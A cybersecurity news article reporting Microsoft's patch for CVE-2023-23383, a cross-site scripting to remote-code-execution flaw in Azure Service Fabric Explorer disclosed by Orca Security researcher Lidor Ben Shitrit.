Microsoft patches second Azure inspection tool vulnerability
Microsoft has patched a second, more severe vulnerability affecting a popular Azure inspection tool called Azure Service Fabric Explorer.
In October, researchers from Orca Security worked with Microsoft to release guidance on a bug known colloquially as “FabriXss” because it affects the Service Fabric Explorer (SFX) tool and makes use of a vulnerability known as “cross-site scripting” that involves the injection of malicious code into otherwise benign and trusted websites.
One of the Orca Security researchers, Lidor Ben Shitrit, revealed on Thursday that he discovered a second vulnerability he dubbed “Super FabriXss.”
“With Super FabriXss, a remote unauthenticated attacker can execute code on a container hosted on one of the Service Fabric nodes,” Shitrit said. “This means that an attacker could potentially gain control of critical systems and cause significant damage.”
Microsoft Azure Service Fabric is a platform for distributed systems that enables the packaging, deployment, and management of stateless and stateful microservices and containers on a large scale. It is compatible with Windows and Linux operating systems, and can be deployed on any cloud, datacenter, or even on a personal laptop, spanning across geographic regions.
Microsoft tagged the bug as CVE-2023-23383 and thanked Orca for disclosing the issue before any customers were impacted.
“This was addressed with our March security release and customers who have automatic updates enabled, or have applied the update manually, are already protected,” a Microsoft spokesperson told Recorded Future News, adding that the bug has a CVSS score of 8.2.
Shitrit said the latest issue is much more dangerous than the vulnerability discovered in October because it allows attackers to achieve full remote code execution on a container without the need for authentication.
Shitrit explained in a blog post that for the FabriXss vulnerability that was found in October, both Linux and Windows Clusters were susceptible. But the SuperFabriXxs vulnerability only exists in the Windows Cluster.
The blog post provides a more detailed walkthrough of how the bug can be exploited and Shitrit urged organizations using Service Fabric Explorer version 9.1.1436.9590 to patch the issue if automatic updates are not applied.
Jonathan Greig is a Breaking News Reporter at Recorded Future News. Jonathan has worked across the globe as a journalist since 2014. Before moving back to New York City, he worked for news outlets in South Africa, Jordan and Cambodia. He previously covered cybersecurity at ZDNet and TechRepublic.